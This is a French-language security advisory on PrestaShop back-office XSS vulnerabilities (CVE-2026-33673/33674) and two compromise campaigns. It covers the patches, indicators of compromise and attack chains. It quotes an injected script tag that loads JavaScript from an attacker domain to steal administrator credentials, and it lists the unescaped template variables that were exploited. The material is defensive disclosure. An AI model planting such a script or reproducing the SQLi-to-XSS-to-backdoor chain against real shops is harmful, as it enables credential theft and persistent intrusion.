Retour à la liste
24 mars 2026

Correction failles XSS Back Office PrestaShop mars 2026 – [CVE-2026-33673 (et CVE-2026-33674)]

Date : 23 mars 2026
Criticité : ÉLEVÉE
Versions affectées : Toutes versions PrestaShop
CVE : CVE-2026-33673
Statut patches : Disponibles pour PS 8.2.5 et 9.1.0
Recherche et analyse Forensic : 202 ecommerce / Prestafence
Auteur des patches : 202 ecommerce / Prestafence

Contexte

Depuis le S1 2025, l’écosystème PrestaShop subit deux campagnes de compromission majeures exploitant des vulnérabilités XSS (Cross-Site Scripting) dans le back-office.

Ampleur estimée : 500+ boutiques PrestaShop compromises
Vecteur principal : Injection de code malveillant via SQLi -> XSS -> Installation backdoor
Impact : Vol d’identifiants administrateurs, installation de malwares persistants

Campagne 1 : softbylinux / softwarebyms  

Période active : S1-S2 2025
Boutiques infectées : 300+ recensées

Indicateur de compromission principal
Présence de domaine malveillant dans le de la page d’accueil :

  • softwarebyms[.]com
  • softbylinux[.]com

Exemple de code compromis

<title>Mon titre</title><p hidden>"<script defer src="https://softwarebyms.com/t2ps.js"></script><p hidden></title>

Vecteur d’attaque

  1. Point d’entrée : Injection SQL dans variable PS_SHOP_NAME (table ps_configuration)
  2. Exploitation : La balise <script> injectée n’est pas échappée dans les templates back-office
  3. Exécution : Lors de la visite de la page login du BO, le script s’exécute (XSS) 
  4. Impact : Exfiltration des identifiants administrateurs vers serveur malveillant

Campagne 2 : i-bracket 

Période active : Depuis Q4 2025 (depuis septembre)
Boutiques infectées : 200+ recensées

Indicateur de compromission principal
Présence de marqueur dans la balise :
Pattern : [i]ps_[i]VERSION[i]NOMBRE

Exemple de code compromis :

meta name="description" content="Ma boutique en ligne.[i]ps_[i]1.7.8.7[i]46011

Décryptage du marqueur :

  • ps_ : Préfixe de base de données
  • 1.7.8.7 : Version PrestaShop
  • 46011 : Nombre de commandes depuis le 1/9/2025

Vecteur d’attaque (chaîne SQLi → XSS → RCE)

  1. Étape 1 – SQLi : Injection SQL dans un module tiers vulnérable
  2. Étape 2 – XSS : Injection de code JavaScript dans le champ firstname de la table ps_employee
  3. Étape 3 – Exécution : Lors de la prochaine authentification d’un admin, le XSS s’exécute
  4. Étape 4 – Backdoor : Installation automatique et silencieuse du module malveillant ps_analytics_enhancer
  5. Étape 5 – Persistance : Le module offre un accès permanent (backdoor) au serveur

Note : cette chaîne de vulnérabilité affecte particulièrement PrestaShop 1.7.x à où les SQLi sont facilement réalisables et où les variables Smarty non échappées sont nombreuses dans le back-office.

Analyse technique des vulnérabilités  

Problème fondamental : Échappement insuffisant en back-office

PrestaShop toute version :

  • ✅ Front-office : Variables Smarty échappées par défaut ({$variable}devient {$variable|escape:’html’})
  • ❌ Back-office : Pas d’échappement automatique dans les templates legacy

Conséquence : Toute donnée stockée en base (même via SQLi) et affichée en BO peut exécuter du JavaScript arbitraire.

Variables non échappées exploitées
Exemples de variables vulnérables dans templates BO legacy : 

  • {$shop.name} (PS_SHOP_NAME) 
  • {$employee.firstname} / {$employee.lastname}
  • {$quick_access.name} 
  • Champs dans tables *_lang(descriptions produits, catégories, etc.) 

Plus d’information sur CVE-2026-33673

Ce patch corrige l’échappement de plusieurs variables smarty (template legacy du backoffice) mais introduit également dans le core de PrestaShop la fonction Twig raw_purified qui permet de ne pas appliquer d’échappement (comme raw) mais passe le contenu de la variable à la purification de HTML Purifier.
Ceci permet notamment de prévenir les chaînes d’exploitation de XSS utilisant le système de traduction moderne stockée en base de données. Il est donc important d’appliquer l’ensemble des corrections de ce patch.

Plus d’information sur CVE-2026-33674

  • GHSA-283w-xf3q-788 : Défaut de validation en backoffice
  • Affecte : Toutes versions jusqu’à < 8.2.5 & 9.1.0  
  • Patch

Ce patch corrige la validation de formulaires en backoffice afin de prévenir des store XSS. La méthode isCleanHTML a été agrémentée de nouveaux paramètres interdits.

Ressources et contacts

Documentation officielle PrestaShop

Outils et services

  • PrestaFence : WAF / 2FA / CSP 
  • Contacts urgence : site hacké ? contact [@] prestafence.com

Autres liens utiles